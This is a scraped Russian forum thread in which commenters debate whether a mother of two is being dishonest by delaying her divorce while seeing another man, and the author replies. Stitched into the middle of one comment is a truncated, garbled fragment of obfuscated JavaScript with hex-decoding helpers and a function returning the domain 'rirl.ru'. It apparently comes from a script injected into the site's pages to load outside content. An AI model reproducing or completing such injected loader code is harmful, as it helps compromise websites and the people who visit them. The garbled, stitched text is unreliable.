Я не понимаю одного. Если вы говорите, что мужа не любите и 100% с ним разведетесь. Так что же не разводитесь сейчас? Ради чего вы с ним живете? Только ради денег? Ради мизерной з/п инженера? Секс только за деньги можно называть разными словами, но как ни назови - суть не меняться и все понимают, что это такое.

Вы уже спокойно все решили, только мужа в известность не поставили, что он вам по сути уже не муж, а так, временный ресурс.

Какой бы он ни был, он ваш муж, отец ваших детей. И раз вы уже решили, что уйдете от него 100%, так давайте, воспользуйтесь добротой своей души, о которой вы говорите, и поступите с человеком по доброму: не морочьте голову, не наставляйте рога, дайте возможность устроить свою жизнь и найти женщину, которая его полюбит. А не ждите момента, когда вам будет удобнее всего ударить исподтишка. Возможно и дети вас за это больше уважать будут, когда все узнают.

Я представила, если бы со мной жили вот так, все уже решив, постоянно говоря ложь, только лишь ожидая минуты, когда я больше не понадоблюсь, буду использована по-максимуму и меня можно будет выбросить, как ненужный мусор. И это ужасно. Мягкие, добрые душой люди так не поступают. Мне кажется, так поступают все больше хитрые лицемеры и манипуляторы.

Ответить
Поддерживаю Да4 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
белая мышка
9141 белая мышка
Белая мышка online
Репутация : 141390
Комментариев 1509 25
19 февраля 15:13:07
2016-02-19 15:13:07

Сиреневая Кошка, возможно женщине с двумя детьми сложно решиться на такой шаг. Даже если она нам написала, что решила на 100%, то наверняка кошки на душе скребутся от грядущих перемен, и в моральном, и материальном плане. Возможно много нерешенных проблем и открытых вопросов.

Да и почему она должна поступать с мужем по-человечески, если он с ней поступал и поступает по свински. Только что деньги в дом несет. Нормальная женщина сначала почву подготовит, а потом разведется. Если она конечно не из тех, кто "вторую щеку подставляет"

Ответить
Поддерживаю Да1 / Нет0
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1665806
Комментариев 6917 36
19 февраля 15:32:33
2016-02-19 15:32:33

белая мышка, Ну я все равно не соглашусь. Каждый при своем. Я считаю, это подло и аморально.

Если бы муж был такой свиньей, ушла бы раньше, по крайней мере точно бы не рожала второго ребенка от свиньи. К чему эти жертвы? Раз жила и рожала, значит он ее такой устраивал, за что ему в таком случае мстить?

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249627
Комментариев 2468 8
19 февраля 20:11:38
2016-02-19 20:11:38

Возможно если бы не возник Андрей на горизонте, автор бы таки плыла по течениюс мужем... Ясно, что Андрей стал детонатором её желания развестись с мужем. Жаль будетеслиавторв нём обманется... Согласна , что то, что Вы тянете с разводом не красиво по отношению к мужу.

Ответить
Поддерживаю Да2 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Автор
Автор

20 февраля 11:30:32
2016-02-20 11:30:32
Сиреневая Кошка, благодарю за комментарий! Сразу видно, что вы пока не познали чуда материнства. Желаю вам стать отличной матерью и выбрать в спутники жизни достойного человека!Дети это величайшая радость и Божья благодать!Оглядываясь назад, могу с уверенностью вам сказать, что я нисколько не жалею о том, что у меня появились дети, я их очень люблю несмотря ни на что... Мне кажется, что не хватить и всей жизни, чтоб замолить мои греховные мысли на счет аборта... я повторюсь, что никогда не пойду на убийство... если Бог пошлет ещё ребенка, то конечно буду рожать... Согласна, что поступаю нечестно, но иного выхода я не вижу... В первую очередь, я сейчас думаю о детях!Мне сейчас некуда пойти, пока нет крыши над головой... помочь кроме моего папы мне не кому. Хорошо конечно рассуждать со своей \"колокольни\". Очень и очень много нюансов и их надо решать, нельзя просто встать и уйти!Можно по всякому меня тут называть, я спокойно отношусь к разного рода комментариям в свой адрес, мне уже давно не 16 лет и я не обладательница взрывного характера!
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

20 февраля 11:30:35
2016-02-20 11:30:35
белая мышка, спасибо за комментарий!Да, действительно я готовлю почву!Все верно!
Ответить
Поддерживаю Да0 / Нет0
Автор
Автор

20 февраля 11:30:42
2016-02-20 11:30:42
Странная_Такая , благодарю за комментарий... Но я бы не плыла по течению с мужем, мы давно плывем уже в разных направлениях... Мысли о разводе назрели уже давно!Я не хочу впутывать Андрея в свои семейные дрязги... через два дня мы с ним встретимся, я думаю, что у него уже созрели какие то мысли, он отошел от шока. Детонатором стал сын... я просто поняла, что мужу не нужны дети, он не хочет двигаться дальше, хотя возраст уже не молодой, он не принимает никаких попыток улучшить нашу жизнь как в материальном, так и в духовном плане... можно еще много чего написать, но просто не хочу углубляться
Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249627
Комментариев 2468 8
20 февраля 11:51:03
2016-02-20 11:51:03

Автор, Автор и Вам спасибо за ответ))))Я от всей души желаю Вам женского счастья) Вы приятный человек и хорошая мама, а с Андреем или без него как судьба распорядится) Вы работаете над своей жизнью, может где то и ошибаетесь, и думаю, что все у Вас получится)))Удачи)

Ответить
Поддерживаю Да1 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Автор
Автор

20 февраля 16:04:00
2016-02-20 16:04:00
Странная_Такая , огромное спасибо! Вам тоже успехов во всех сферах жизни и огромного здоровья!!!
Ответить
Поддерживаю Да0 / Нет0
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
23 февраля 17:57:45
2016-02-23 17:57:45

Да уж, ваш муж-крайне наивный человек, верит что у вас просто дружба с этим Андреем, мой бы на такие сказки не повелся))с самого начала было понятно к чему такая дружба может привести. По поводу Андрея-вы ему явно с 2-мя детьми не нужны, а закрутил он с вами просто потому что вы сами проявили инициативу, у мужиков же какая психология-предлагают-надо брать. Так что все это несерьезно!!!!Серьезных причин для развода не вижу, ваш муж пашет старается семью обеспечить, а вы думаете только о себе и своих прихотях. Подумайте лучше о детях и о том как вы их будете обеспечивать!!!Одного-то ребенка нелегко поднять, а тут 2-е!!!Кто с детьми будет помогать когда вы на работе будете, они в садике болеют часто, а больничный часто будете брать вас уволят быстренько!!Короче подумайте еще раз хорошенько, заканчивайте с этой "дружбой"и с мужем попытайтесь лучше все наладить!!!

Ответить
Поддерживаю Да0 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Автор
Автор

24 февраля 15:46:29
2016-02-24 15:46:29
ксюня-звезда , спасибо за комментарий! Мне уже давно не 18 лет, чтобы совершать необдуманные поступки! С Андреем давняя дружба и надо знать человека лично, чтобы делать такие поспешные выводы насчет того, что это просто развлечение! Все я прекрасно понимаю, что двое детей и т. д. , поэтому я и выжидаю время, что с одной стороны не очень правильно, но иного выхода я не вижу!Я сейчас не могу уйти в никуда....
Ответить
Поддерживаю Да0 / Нет0
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
24 февраля 23:54:03
2016-02-24 23:54:03

Автор, Так и не надо уходить!Возможно просто Андрей-это случайный эпизод, а с мужем вы же все-таки давно живете. А чтобы уходить надо точно знать что Андрею вы нужны, потому что оставаться одной я вообще смысла не вижу.

Ответить
Поддерживаю Да0 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Автор
Автор

25 февраля 09:11:24
2016-02-25 09:11:24
ксюня-звезда , я просто устала от постоянных упреков мужа, ссор на пустом месте и самое главное вспышек агрессии.. лучше быть одной, чем всю жизнь до конца дней мучаться...
Ответить
Поддерживаю Да2 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке